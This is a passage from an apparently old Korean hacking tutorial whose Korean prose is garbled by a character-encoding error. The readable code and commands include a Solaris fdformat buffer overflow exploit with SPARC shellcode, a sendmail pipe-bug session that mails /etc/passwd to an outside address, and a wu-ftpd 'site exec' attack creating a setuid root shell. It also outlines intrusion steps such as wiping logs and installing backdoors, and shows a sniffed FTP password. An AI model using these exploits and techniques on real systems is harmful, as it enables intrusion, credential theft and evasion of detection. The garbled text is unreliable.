´ëÇÑ ÀÚ¼¼ÇÑ ¿ø¸®¿Í Á¦ÀÛ ¹æ¹ýÀÌ ¼Ò°³µÇ¸é¼ Áö±Ý ±îÁöµµ ¸¹Àº ¾çÀÇ
¹öÆÛ ¿À¹öÇÃ·Î¿ì °ø°Ý¹æ¹ýÀÌ »ý°Ü³ª°í ÀÖ´Ù.
¿ø¸®¸¦ °£´ÜÈ÷ »ìÆ캸ÀÚ¸é : ¸Þ¸ð¸®ÀÇ ½ºÅÿµ¿ªÀ»
³ÑÃÄÈ帣°Ô Çؼ ¸®ÅϵǴ ÁÖ¼ÒÁö¸¦ º¯°æÇÏ¿© ¿øÇÏ´Â ÀÓÀÇÀÇ ¸í·É¾î¸¦
½ÇÇà½ÃŲ´Ù´Â ±×·± ¸»¾¸.. ( »ç½Ç ¿ø¹®À» ÀÚ¼¼ÇÏ°Ô À̾߱âÇÏÀÚ¸é
¿©·¯ºÐµéÀÌ ÀÌÇظ¦ ¸øÇÒ·±Áöµµ ¸ð¸¥´Ù. ÀÌ Á¤µµ¸¸ ¾Ë°í Àֱ⸦...
- ±×·¡µµ ³»°¡ ÇÑ ¸»ÀÌ ÇÙ½ÉÀÌ´Ù! ÇÙ½É!!)
À̹ø¿£ ¹öÆÛ ¿À¹öÇ÷ο츦 ÀÏÀ¸Å°´Â ÇÁ·Î±×·¥À»
Çϳª »ìÆ캼±î? fdformatÆÄÀÏÀº µð½ºÅ©³ª PCMCIA ¸Þ¸ð¸®
Ä«µå¸¦ Æ÷¸ä½Ãų¶§ »ç¿ëÇÏ´Â À¯Æ¿¸®Æ¼ÀÌ´Ù. Àμö äũ¸¦ ÇÏÁö
¾Ê¾Æ¼ »ý±ä ¹ö±×ÀÌ´Ù.
/* Solaris 2.5.1 - this exploited was
compiled on Solaris2.4 and tested on 2.5.1 */ # ¼Ö¶ó¸®½º
2.4 ~ 2.5.1 ±îÁöÀÇ °ø°ÝÄÚµå
#include <stdio.h> #include <stdlib.h>
#include <sys/types.h> #include <unistd.h>
#define BUF_LENGTH 364 #define EXTRA
400 #define STACK_OFFSET 704 #define SPARC_NOP 0xa61cc013
# ÀÌ ºÎºÐÀÌ ¹Ù·Î root shellÀ» ¾ò¾î³»´Âµ¥ ÇÙ½ÉÀÎ
½© ÄÚµå # ºÎºÐÀÌ´Ù. u_char sparc_shellcode[] =
¡°¡¬x2d¡¬x0b¡¬xd8¡¬x9a¡¬xac¡¬x15¡¬xa1¡¬x6e¡¬x2f¡¬x0b¡¬xda¡¬xdc¡¬xae¡¬x15¡¬xe3¡¬x68¡±
............. # ½© ÄÚµå µÎ ÁÙ »èÁ¦ ...................
¡°¡¬x82¡¬x10¡¬x20¡¬x3b¡¬x91¡¬xd0¡¬x20¡¬x08¡¬x90¡¬x1b¡¬xc0¡¬x0f¡¬x82¡¬x10¡¬x20¡¬x01¡±
¡°¡¬x91¡¬xd0¡¬x20¡¬x08¡±;
u_long get_sp(void) { __asm__(¡°mov
%sp,%i0 ¡¬n¡±); }
void main(int argc, char *argv[]) {
char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr;
u_long *long_p; u_char *char_p; int i, code_length
= strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ; targ_addr =
get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH
- code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long);
i++) *long_p++ =targ_addr;
printf(¡°Jumping to address 0x%lx B[%d] E[%d]
SO[%d]¡¬n¡±, targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl(¡°/bin/fdformat¡±, ¡°fdformat¡±, & buf[1],(char
*) 0); perror(¡°execl failed¡±); } # Àß ¸ð¸£°Ú´Ù¸é
À¯´Ð½º ÇÁ·Î±×·¡¹ÖÀ» ¹è¿ìÀÚ.. (³ªµÎ.. ³ªµÎ.. --;)
°£´ÜÈ÷ ÄÄÆÄÀÏ ½ÃÅ°°í ½ÇÇàÀ» ½ÃÅ°ÀÚ¸é
% gcc -o fdformat fdformat.c % ./fdformat
..... ... # whoami root
ÆÐÄ¡°¡ µÇ¾îÀÖ´Ù¸é ´ç¿¬È÷ ¾È ¸ÔÈú °ÍÀÌ°í....
ÀÌ Á¤µµ·Î Local attack¿¡ °üÇÑ À̾߱⸦
¸¶¹«¸® ÁöÀ»±î ÇÑ´Ù. ´ëÃæ.. ¾Æ~ ÀÌ·¸°Ô Çϴ±¸³ª.. ÀÌ·± ¹æ½ÄÀ¸·Î
°ø°ÝÇϴ±¸³ª... ÀÌ Á¤µµ¸¸ ¾Ë¾ÆµÎ°í ³Ñ¾î°¡ÀÚ.
3. Remote attack
À§¿¡¼ ¸®¸ðÆ® °ø°Ý¿¡ °üÇÏ¿© ´ëÃæ µé¾úÀ» °ÍÀÌ´Ù.
¹Ù·Î °ø°Ý¿¡ µé¾î°¡ÀÚ~ µ¹Áø!
- ¼¾µå¸ÞÀÏ ¹ö±×
¸®¸ðÆ® °ø°ÝÀÇ ´ëÇ¥ÀûÀÎ ÁÖÀÚ´Â ¹Ù·Î ÀÌ Sendmail ÀÏ °ÍÀÌ´Ù. ÇÁ·Î±×·¥ÀÇ
Å©±â°¡ ´Ù¸¥°Í º¸´Ù ¹«Ã´ Å©±â ¶§¹®¿¡ ±× ¸¸Å ¹ö±×°¡ ¸¹ÀÌ
Á¸ÀçÇÑ´Ù. (local bugµµ ¹«Ã´ ¸¹´Ù...)
ÀÌ ¹æ¹ýÀº ¸î ³â Àü SunOs 4.1.x´ëÀÇ sendmail
¹öÀü 4.1¿¡¼ À¯ÇàÇß´ø ¹ö±×ÀÌ´Ù. ±×·³ ¿ª½Ã³ª ÂùÂùÈ÷ »ìÆ캸µµ·Ï
ÇÏÀÚ.
% telnet salsari.org 25 # smtp Æ÷Æ®·Î ÅÚ³ÝÇØ
µé¾î°£´Ù. Trying 255.255.255.255 ... Connetcted to
salsari.org. # Á¢¼ÓµÇ¾ú´Ù. Escape character is ¡®^]¡¯ #
¸¸¾à ºüÁ®³ª°¡°í ½Í´Ù¸é Ctrl + ] ´·¯¶ó.
220 salsari.org Sendmail 4.1/SMI-4.1 ready
at Wed, 6 Mar 99 01:59:21 KST # ¼¾µå¸ÞÀÏ ¹öÁ¯È®ÀÎ
mail from:¡±|/bin/mail salsari@hotmail.com
< /etc/passwd¡± # salsari@hotmail·Î /etc/passwdÆÄÀÏÀ»
º¸³»¶ó´Â ¸í·É - ÆÄÀÌÇÁ(|) ¹ö±× ÀÌ¿ë # from ÀԷ¿¡¼ ÆÄÀÌÇÁ
ÀÌÈÄ ¸í·É¾î°¡ ½ÇÇà°¡´ÉÇÏ°Ô µÇ¾îÀÖ´Ù.
250 ¡°|/bin/mail salsari@hotmail.com <
/etc/passwd¡±... Sender ok # µ¥¸óÀº ÀÔ·Â ¹Þ¾Ò´Ù.
rcpt to : root # ¹Þ´Â »ç¶÷ root
250 root... Recipient ok # µ¥¸óÀÌ ¸»ÇÏ±æ ¡°¾Ë°Ú¾î¡± data
# º¸³¾ ³»¿ë ÀÛ¼º 354 Enter mail, end with ¡°.¡± on a line
by inself babo... # ¹Ùº¸... -_- (¾Æ¹«³»¿ëÀ̳ª Áý¾î ³Ö´Â´Ù.)
# . À» ÂïÀ¸¸é ³»¿ë ÀÛ¼ºÀ» ¸¶Ä£´Ù. 250 Mail accepted
quit # ºüÁ®³ª°¡ÀÚ. 221 salsari.org delivering mail
Connection closed by foreign host.
# Á¢¼ÓÀº ²÷¾îÁö°í ÀÌÁ¦ Æнº¿öµå ÆÄÀϸ¸ ÀÚ½ÅÀÇ
E-mail·Î ¿À±â¸¦ ±â´Ù¸®¸é µÈ´Ù.
ÀÌ·¸°Ô ¾òÀº Æнº¿öµå ÆÄÀÏÀ» Å©·¢ÇØ (Àç¼ö ÁÁÀ¸¸é
root Æнº¿öµåµµ ¾òÀ» ¼ö ÀÖ´Ù.) local·Î Á¢¼ÓÇÑµÚ localÀÇ ¼ö¸¹Àº
¹ö±×¸¦ ÀÌ¿ëÇÏ¿© root¸¦ ¾òÀ¸¸é µÇ´Â °ÍÀÌ´Ù.
±×·³ Á¶±Ý ÃÖ±ÙÀÇ wu-ftp 2.4 ¹öÀüÀÇ ¹ö±×¸¦
»ìÆ캸ÀÚ. ÀÌ ¹ö±×´Â site exec ¸í·É¾î¸¦ ¼öÇàÇÒ ¼ö ÀÖ¾î¼
½±°Ô root shellÀ» ¾òÀ» ¼ö ÀÖ´Ù.
COMMAND wu.ftpd(8)
SYSTEMS AFFECTED Sites running wuarchive
ftpd versions prior to 2.3 or running ¡°wrl¡± ftpd version
??
PROBLEM: # site exec ¸í·É¾î´Â ftp¿¡¼ ½© ¸í·É¾î¸¦
½ÇÇà½Ãų¼ö ÀÖ´Ù.
Compile program : # °ø°Ý ¼Ò½º - ¸¸µé°í ³ª¼
ÄÄÆÄÀÏ ½ÃÅ°ÀÚ. # ÄÄÆÄÀÏ : cc -o ftpbug ftpbug.c #include
< stdio.h> #include < stdlib.h> #include
< unistd.h>
main() { seteuid (0); system
(¡°cp /bin/sh /tmp/.sh¡±); system (¡°chmod 6777 /tmp/.sh¡±);
}
Login to the system : # ÄÄÆÄÀÏ ½ÃÄ×À¸¸é ftp·Î
Á¢¼Ó
220 exploitablesys FTP server (Version wu-2.4(1)
Sun Jul 31 21:15:56 CDT 1994) ready. Name (exploitablesys:root):
goodaccount # ÀÚ½ÅÀÇ user name ÀÔ·Â 331 Password required
for goodaccount. Password: (password) # password ÀÔ·Â
230 User goodaccount logged in. Remote system type is UNIX.
Using binary mode to transfer files.
See if system is exploitable : # ftp bug°¡
Á¸ÀçÇÏ´ÂÁö testÇÑ´Ù.
ftp> quote ¡°site exec bash -c id¡± # ÀÌ
¸í·É¾î¸¦ ÀÔ·ÂÇßÀ»¶§... 200-bash -c id # id ¸í·É¾î¸¦ ½ÇÇà
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users)
groups=100(users) 200 (end of ¡®bash -c id¡¯) # °á°ú°¡
ÀÌ·¸°Ô ³ªÅ¸³´Ù¸é °ø°Ý´ë»óÀÌ´Ù.
Exploit system : # test°¡ ¼º°øÀ̶ó¸é ½ÇÁ¦ÀûÀ¸·Î
°ø°ÝÇÏÀÚ.
# ¸¸µé¾î µÎ¾ú´ø °ø°ÝÄڵ带 ½ÇÇà½ÃÅ°¸é root
±ÇÇÑÀ» ¾òÀ» # ¼ö ÀÖ´Â .sh ÆÄÀÏÀÌ /tmp/.sh ¿¡ »ý¼ºµÈ´Ù.
ftp> quote ¡°site exec bash -c /yer/home/dir/ftpbug¡±
200-bash -c /yer/home/dir/ftpbug 200 (end of ¡®bash
-c /yer/home/dir/ftpbug¡¯) ftp> quit # ½ÇÇà ½ÃÄ×À¸´Ï
ÀÌÁ¦ ºüÁ®³ª°¡ÀÚ. 221 Goodbye. # ±×¸®°í /tmp/.sh½ÇÇà!!!!
¿©·¯ºÐµéÀº ÀÌÁ¦ºÎÅÍ root´Ù!!!
remote attackÀÇ µÎ ¿¹¸¦ »ìÆ캸¾ÒÁö¸¸ µÎ °¡Áö
´Ù À߸øµÈ ¼³Á¤À¸·Î ¸¸µé¾îÁø holeÀÌ´Ù. ÀÌ·±°Íµé ¸»°í daemonÀÌ
°¡Áö°í ÀÖ´Â ¹ö±×¿¡ ÀÇÇÑ buffer overflow°¡ ÀÖ´Ù. ´ëÇ¥ÀûÀÎ °ÍÀÌ
ÃÖ±Ù¿¡ ³ª¿Â wu-ftp 2.4.2 ¹öÀü´ëÀÇ remote buffer overflowÀÌ´Ù.
4. ÃÖ±Ù ¹ö±×µé
- linux
Linux_INN - ·¹µåÇò ¸®´ª½º 6.0 INN Ãë¾àÁ¡ ¹× ´ëÃ¥ Linux_pop2d
- pop2d Ãë¾àÁ¡ ¹× ´ëÃ¥ Linux super buffer overflow - super
¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
- sun / solaris
SUN-automountd - SUN automountd Ãë¾àÁ¡ SUN-passwd - Sun
passwd ¼ºñ½º °ÅºÎ Ãë¾àÁ¡ ¹× ´ëÃ¥ Sun man/catman - Sun
man/catman Ãë¾àÁ¡ ¹× ´ëÃ¥ Sun CDE - Sun CDE Ãë¾àÁ¡ ¹× ´ëÃ¥
SUN sdtcm_convert - sdtcm_convert Ãë¾àÁ¡ ¹× ´ëÃ¥ Solaris_libc
- ¼Ö¶ó¸®½º libc Ãë¾àÁ¡ ¹× ´ëÃ¥
- HP/UX
HP sendmail DOS - HP Sendmail DOS Ãë¾àÁ¡ ¹× ´ëÃ¥ HP_ftp
- HP-UX ftp Ãë¾àÁ¡ ¹× ´ëÃ¥ HP CDE ttsession - HP CDE ttsession
Ãë¾àÁ¡ ¹× ´ëÃ¥
- AIX AIX
Vulnerability in ptrace() system call - AIX ptrace() ½Ã½ºÅÛ
ÄÝÀÇ ¼ºñ½º°ÅºÎ°ø°Ý Ãë¾àÁ¡ AIX named-xfer security problem
- AIX named-xfer º¸¾È Ãë¾àÁ¡ ¹× ´ëÃ¥ AIX pdnsd buffer overflow
- IBM AIX pdnsd ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
- IRIX IRIX
X server path - IRIX X server path Ãë¾àÁ¡ ¹× ´ëÃ¥ IRIX_midikeys
- IRIX midikeys Ãë¾àÁ¡ ¹× ´ëÃ¥
- DOS tcp-denial-of-service
- TCP/IP ¼ºñ½º °ÅºÎ Ãë¾àÁ¡ ¹× ´ëÃ¥ Using the Domain Name
System DoS attack - µµ¸ÞÀγ×ÀÓ ½Ã½ºÅÛÀ» ÀÌ¿ëÇÑ ¼ºñ½º°ÅºÎ(DoS)°ø°Ý
- trojan / virus
Trojan Tcp Wrapper - Æ®·ÎÀ̸ñ¸¶ ¹öÀüÀÇ TCP Wrapper Melissa-Macro-Virus
- Melissa ¸ÅÅ©·Î ¹ÙÀÌ·¯½º CIH-Virus - CIH ¹ÙÀÌ·¯½º
- FTP FTP-buffer
overflows - FTP Buffer Overflows Ãë¾àÁ¡°ú ´ëÃ¥ Remote buffer
overflow in ftpd daemon. ProFTPD 1.2.0pre1 ÀÌÀü ¹öÀüÀº
Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½ wu-ftpd 2.4.2(beta 18)±îÁöÀÇ ¸ðµç
¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½ wu-ftpd VR series - 2.4.2(beta
18) VR10 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½ BeroFTPD 1.2.0
ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½ NcFTPd 2.3.4 ÀÌÀü ¹öÀüÀº
Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½ Crashing FTP Serv-U 2.5 - FTP Serv-U
2.5 Ãë¾àÁ¡ ¹× ´ëÃ¥
- ETC lsof
buffer boverflow - lsof ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
umapfs - umapfs Ãë¾àÁ¡ ¹× ´ëÃ¥ cmsd-Buffer Overflow - Calendar
Manager ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥ Accelerated-X Overflow
- Accelerated-X X¼¹ö Ãë¾àÁ¡ ¹× ´ëÃ¥ Tiger vulnerability
- Tiger Ãë¾àÁ¡ ¹× ´ëÃ¥ amd buffer overflow vulnerability
- amd ¿ø°Ý ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
5. ÇØÄ¿µéÀÇ ÇØÅ· ¹æ¹ý·Ð
¿©·¯ºÐµéÀº À§¿¡¼ Local host ¿¡¼ root¸¦ ¾ò´Â
¹æ¹ý°ú Remote host¿¡¼ root¸¦ ÃëÇÏ´Â ¹æ¹ýÀ» º¸¾ÒÀ» °ÍÀÌ´Ù. ÇÏÁö¸¸
ÀÌ·± ¹æ¹ýµéÀº Áö±ØÈ÷ ±Ø´ÜÀûÀÎ ¹æ¹ýÀ̶ó°í º¼ ¼ö ÀÖ´Ù. ±×·³ ÇØÄ¿µéÀÌ
ÇϳªÀÇ ½Ã½ºÅÛÀ» ÇØÅ·Çϱâ À§Çؼ ¾î¶² ¼ø¼¸¦ °ÅÃļ ¾î¶»°Ô ÇØÅ·ÇÏ¿©
root¸¦ ÃëÇÏ´ÂÁö ¾Ë¾Æº¼ ÇÊ¿ä°¡ ÀÖ´Ù.
5.1 Á¤º¸¼öÁý
¿ì¼± ¿©·¯ºÐµéÀÌ »ç¿ëÇÏ´Â ½Ã½ºÅÛÀ» A, °ø°Ý
¸ñÇ¥°¡ B¶ó°í ÇÑ´Ù¸é B¿¡ °ü·ÃµÈ Á¤º¸¸¦ ¼öÁýÇØ¾ß ÇÒ °ÍÀÌ´Ù. ¹°·Ð
B¿¡ ¿©·¯ºÐµéÀÌ »ç¿ëÇÏ´Â °èÁ¤À̳ª ȤÀº ¾Æ´Â °èÁ¤ÀÌ ÀÖ´Ù¸é ÀÏÀº
½¬¿öÁö°ÚÁö¸¸ ±×·¸Áö ¾Ê´Ù°í ÇßÀ» °æ¿ì ¾î¶»°Ô Çؼµç B¿¡ ħÅõÇؾ߸¸
ÇÑ´Ù. ( ¿Ö³Ä¸é remote bug¿¡ ºñÇØ local bug°¡ ¹«±Ã¹«Áø Çϰŵ¢...
remote bug¸¦ ÀÌ¿ëÇؼ root°¡ µÇ¸é ´õ ÁÁ°í... ) ±×·²·Á¸é
finger³ª smtp, rusers, rpcinfo µî°ú °°Àº °ÍÀ¸·Î »ç¿ëÇÒ ¸¸ÇÑ
°èÁ¤Àº ¾ø´ÂÁö ȤÀº remote bug´Â °¡Áö°í ÀÖÁö ¾ÊÀ»±î¸¦ »ìÆ캸°Ô
µÈ´Ù. bugµéÀ» ¿©·¯ºÐµé¿¡°Ô ÀÚµ¿À¸·Î ¾Ë·ÁÁÖ´Â remote bug scan
ÇÁ·Î±×·¥µéÀÌ Àֱ⵵ ÇÏ´Ù. sscanÀ̳ª mscan µîÀÌ ±× ´ëÇ¥ÀûÀÎ ¿¹
ÀÌ´Ù. ±×¸®°í °ü¸®ÀÚÀÇ ÆÐÅϵµ ¾Ë¾Æ¾ß ÇÑ´Ù. ¾î¶² ½Ã°£´ë¿¡ Á¢¼ÓÀ»
ÇÏ¿© ÀÛ¾÷À» Çϴ°¡? °ü¸®ÀÚ°¡ root°¡ ¾Æ´Ñ ¾î¶² ·Î±×Àθí(°èÁ¤)À»
»ç¿ëÇϴ°¡? ¶Ç rootÀÇ idle timeÀÌ ¾î´ÀÁ¤µµÀΰ¡? (root°¡ idle
timeÀÌ ¸¹À» ¼ö·Ï °ÔÀ¸¸¥ °ü¸®ÀÚ°¡ ½Ã½ºÅÛÀ» °ü¸®ÇÑ´Ù°í º¼ ¼ö ÀÖ´Ù.)
½Ã½ºÅÛ¿¡ °ü·ÃµÈ Á¤º¸¸¦ ¼öÁýÇßÀ¸¸é ±¸Ã¼ÀûÀÎ °èȹÀ» ¼ö¸³Çؾß
ÇÑ´Ù.
5.2 °èȹ ¼ö¸³
¾î¶² ¹æ¹ýÀ¸·Î °¥ °ÍÀΰ¡?
- B¿¡ root¸¦ ȹµæ ÇÒ ¼ö ÀÖ´Â remote bug°¡
ÀÖ¾î ¹Ù·Î root°¡ µÉ °ÍÀΰ¡? - A¿¡¼ root ±ÇÇÑÀ» µý ÈÄ root
±ÇÇÑÀ» ÀÌ¿ëÇÏ¿© BÀÇ °èÁ¤À» ¾òÀ» °ÍÀΰ¡? - B¿¡ Ãë¾àÇÑ °èÁ¤ÀÌ
ÀÖ¾î ±×°÷À¸·Î ħÅõÇÒ °ÍÀΰ¡? - cgi bug µîÀ» ÀÌ¿ëÇؼ ¾òÀº
passwd ÆÄÀÏÀ» Å©·¢ ÇÒ °ÍÀΰ¡?
root ·Î ¹Ù·Î ħÅõÇß´Ù¸é - log Á¤º¸¸¦
¾ø¾Ö°í backdoor¸¦ ¼³Ä¡ÇÒ °Í¿¡ °ü·ÃµÈ »çÇ× user
·Î ħÅõÇß´Ù¸é - BÀÇ local bug¸¦ ã´Â´Ù. ±×¸®°í root±ÇÇÑÀ»
¾ò´Â´Ù. - log Á¤º¸¸¦ ¾ø¾Ö°í ½±°Ô µé¾î ¿Ã ¼ö ÀÖµµ·Ï backdoor¸¦
¼³Ä¡ÇÑ´Ù.
ÀÚ, °èȹÀ» ¼ö¸³ÇÏ¿© Â÷·Ê´ë·Î Á¤¸®Çߴ°¡?
5.3 Remote attack
Remote attackÀ» ½ÇÇàÇÑ´Ù. ±×°ÍÀÌ root¸¦ ¾òµç ÀÏ¹Ý user
±ÇÇÑÀ» ¾òµç ¿ì¼± B¿¡ ħÅõÇÏÀÚ!
5.4 Local attack
local bug·Î root¸¦ µû³»ÀÚ.
5.5 ÈçÀû ¾ø¾Ö±â
ħÅõ¿¡ ¼º°øÇß´Ù¸é ±×¸®°í root ±ÇÇÑÀ» ¾ò¾ú´Ù¸é ÈçÀûÀ» ³²°åÀ»
°ÍÀÌ´Ù. last ¸í·ÉÀ̳ª /var/adm(log)/messages, /var/adm/utmp
/var/adm/wtmp µî.. »ìÆ캸¸é ÈçÀûµéÀÌ ³²¾Æ ÀÖÀ» °ÍÀε¥ ÀÌ ÈçÀûµéÀ»
Áãµµ »õµµ ¸ð¸£°Ô ¾Æ¹«·± º¯È¾øÀÌ »èÁ¦Çؾ߸¸ ÇÑ´Ù.
5.6 backdoor
¼³Ä¡ ¿©·¯ºÐµéÀÌ ´Ù½Ã B ½Ã½ºÅÛ¿¡ Á¢¼ÓÇϱâ À§Çؼ ¶Ç ´Ù½Ã
ÇØÅ·À» Çؾ߸¸ ÇÒ±î? ¾Æ´Ï´Ù. backdoor ¶ó´Â °ÍÀÌ ÀÖÁö ¾ÊÀº°¡?
backdoor(µÞ¹®)´Â ½Ã½ºÅÛ ÇØÅ· ÈÄ ´Ù½Ã ±× ½Ã½ºÅÛ¿¡ µé¾î ¿Ã ¶§
½±°Ô µé¾î¿À±â À§ÇÑ ÇϳªÀÇ ¹æ¹ýÀÌ´Ù. ¹éµµ¾îÀÇ Á¾·ù´Â »ó´çÈ÷ ¸¹´Ù.
ÀÚ¼¼ÇÑ °ÍÀº 6.4.5 ¿¡¼ »ìÆ캸ÀÚ.
5.7 ±×¸®°í Áñ±â±â
¸¶À½²¯ ¶Ù¾î ³îÀÚ. °ü¸®ÀÚµéÀ» °ü¸®Çغ¸°í ³» ½Ã½ºÅÛó·³ °¡Áö°í
³îÀÚ. ´Ù¸¸ ½Ã½ºÅÛ¿¡ ÇÇÇظ¦ ÀÔÈ÷´Â ÇàÀ§´Â ÇÏÁö ¸»ÀÚ. ±×°ÍÀº Å©·¡Ä¿µéÀÇ
ÇàÀ§ÀÌ´Ù. Á¶¿ëÈ÷ Á¶¿ëÈ÷ ¾Æ¹«µµ ¸ð¸£°Ô °¡Áö°í ³îÀÚ. ÀØÁö ¾Ê±â¸¦...
6. ±×¿Ü ÇØÅ· ±â¼úµé.
6.1 packet sniffing
sniffer¶õ ³×Æ®¿÷ »ó¿¡ µ¹¾Æ´Ù´Ï´Â ÆÐŶÀ» Àâ´Â
ÇÁ·Î±×·¥ÀÌ´Ù. ¿ø·¡ ¿ëµµ´Â ³×Æ®¿÷ µð¹ö±ë ÀÛ¾÷À̾úÀ¸³ª, º¸¾ÈÅøÀÌ
°ð ÇØÅ·ÅøÀ̵íÀÌ °ð ¹Ù·Î ÇØÄ¿µéÀÇ »ç¶ûÀ» ¹Þ¾Ò´Ù. ÀÌ´õ³ÝÀÇ °æ¿ì
È£½ºÆ® A¿¡¼ È£½ºÆ® B·Î ÆÐŶÀ» º¸³¾¶§´Â broadcast¹æ½ÄÀ¸·Î ÆÐŶÀ»
ÀÌ´õ³Ý Àüü¿¡´Ù°¡ »Ñ¸®°Ô µÈ´Ù. ±×·³ ÁöÁ¤µÈ ÁÖ¼Ò¸¦ °¡Áø È£½ºÆ®´Â
±× ÆÐŶÀ» Àâ°í ±× ¿Ü È£½ºÆ®´Â Àڽſ¡°Ô ¿À´Â ÆÐŶÀÌ ¾Æ´Ï¹Ç·Î
¹«½ÃÇÏ°Ô µÈ´Ù. ±×·³ ´ëÃæ ÀÌÇØ°¡ °¡¸®¶ó º»´Ù. ±× ¹«½ÃµÇ´Â ÆÐŶÀ»
¹«½ÃÇÏÁö ¾Ê°í ó¸®Çعö¸®¸é ¾î¶³±î? ¿©±â¼ sniffingÀÌ Åº»ýÇÏ°Ô
µÇ¾ú´Ù.
-- TCP/IP LOG -- TM: Tue Feb
15 17:04:55 -- PATH: salsari.org(1953)
=> jungmin.org(ftp) STAT: Sun Apr 14
18:09:23, 14 pkts, 49 bytes [TH_FIN] DATA:
USER salsari : : PASS jungminlove
: : CWD backup : : NLST
: : QUIT : --
|
6.2 Spoofing
- IP spoofing TCP/IP ÇÁ·ÎÅäÄÝÀÇ °áÇÔÀ»
ÀÌ¿ëÇØ ½Å·Ú°ü°è¿¡ Àִ ȣ½ºÆ®ÀÇ ip·Î À§ÀåÇØ Ä§ÅõÇÏ´Â °ø°Ý ¹æ¹ýÀ»
ip spoofingÀ̶ó ÇÑ´Ù. ÀÌ °áÇÔ¿¡ ´ëÇؼ´Â 1985³â¿¡ ·Î¹öÆ® ¸ð¸®½ºÀÇ
³í¹® ¡°A Weakness in the 4.2 BSD UNIX TCP/IP Software¡±¿¡ ¾ð±ÞµÇ¾ú°í
1995³â À¯¸íÇÑ ÇØÄ¿ Äɺó¹ÌÆ®´ÐÀÌ ÀÌ ÀÌ·ÐÀ» ½ÇÁ¦ÈÇÏ¿© »ç¿ëÇÏ¿´´Ù.
> ¿©±â¼ Àá±ñ!! R commands(rlogin.
rsh, rcp) ÀÌµé ¸í·É¾î´Â ´ë»ó ½Ã½ºÅÛÀÇ $HOME/.rhostsÀÇ ³»¿ëÀ»
ÂüÁ¶ÇÏ¿© ¾Æ¹« ÀÎÁõ¾øÀÌ È¨µð·ºÅ丮¿¡ Á¢±ÙÇÏ´Â ¸í·É¾îÀÌ´Ù. ¹Ù·Î
½Å·Ú°ü°èÀÇ ´ë¸í»ç¶ó°í³ª ÇÒ±î?
- DNS spoofing DNS ¼¹ö¸¦ DOS °ø°ÝÀ¸·Î
¹«·ÂȽÃÅ°°í È£½ºÆ® ³×ÀÓÀ» ±âÁØÀ¸·Î ÀÎÁõ°úÁ¤À» °ÅÄ¡´Â Ÿ°Ù È£½ºÆ®·Î
ÇÏ¿©±Ý ÇØÄ¿ÀÇ È£½ºÆ®¸¦ ¹Ï°Ô²û DNS Á¤º¸¸¦ º¸³»¾î rlogin, rsh
°ú °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÏ´Â °ø°Ý¹ý.
- Web spoofing Web »ó¿¡¼ °ø°Ý ´ë»ó Web
»çÀÌƮó·³ Èä³»³»¾î Á¤º¸¸¦ »©³»°¡´Â ¹æ½Ä
6.3 IP hijacking
TCP ÇÁ·ÎÅäÄÝÀÇ Ãë¾à¼ºÀÇ ÇϳªÀÎ ¸®´ÙÀÌ·º¼ÇÀ» ÀÌ¿ëÇØ ½Ö¹æÇâ
È£½ºÆ® »çÀÌ¿¡ Connect°¡ µÇ¾î ÀÖ´Â »óŸ¦ »ìÇÇ°í ÀÖ´Ù°¡ Áß°£¿¡
³¢¾îµå´Â ¹æ½ÄÀ» hijacking À̶óÇÑ´Ù. SKEY¿Í °°Àº ÀÏȸ¿ë
Æнº¿öµå³ª Kerberos¿Í °°Àº Ÿ°Ù ±â¹Ý ÀÎÁõ ½Ã½ºÅÛ¿¡ ÀÇÇØ Á¦°øµÇ´Â
º¸È£ ¸ÞÄ¿´ÏÁòÀ» ¿ìȸÇÏ¿© ħÅõÇÒ ¼ö ÀÖ´Ù.
6.4 DOS
DOS(Denial Of Service)´Â ¼ºñ½º °ÅºÎ °ø°ÝÀÌ´Ù. ½±°Ô Ç®ÀÌÇÏÀÚ¸é
°ø°Ý È£½ºÆ®ÀÇ ¼ºñ½º(ftp, smtp, telnet....)µéÀÌ Á¦ ±¸½ÇÀ» ¸øÇϵµ·Ï
¸ÛûÇÏ°Ô ¸¸µé¾î ¹ö¸®´Â °ø°ÝÀÌ´Ù. ÀÌ·± °ø°ÝÀº ¿ì¸®µé¿¡°Ô´Â º°
µµ¿òÀÌ ¾ÊµÇ°ÚÁö¸¸ ¸¸ÀÏ A¶ó´Â ÀÎÅÍ³Ý ¼ºñ½º ¾÷ü(ISP)°¡ B¶ó´Â
¼ºñ½º ¾÷ü¿Í °æÀïÀ» ¹úÀÌ°í ÀÖ´Ù¸é? ´ç¿¬È÷ ¿©·¯ºÐµéÀº ¼ºñ½º°¡
Àß µÇ°í ºü¸¥ ÀÎÅÍ³Ý ¼ºñ½º ¾÷ü¸¦ ¼±ÅÃÇÒ °ÍÀÌ´Ù. ±×·³ A¿¡¼
°í¿ëÇÑ ÇØÄ¿°¡ B¾÷üÀÇ ½Ã½ºÅÛÀ» DOS·Î °ø·«ÇÏ°Ô µÈ´Ù¸é.. B¾÷ü´Â
¼ºñ½º°¡ Àß ¾ÊµÇ°ÚÁö.. »ç¿ëÀÚµéÀº ºÒÆíÀ» °Þ°Ô µÉ °ÍÀÌ°í.. µû¶ó¼
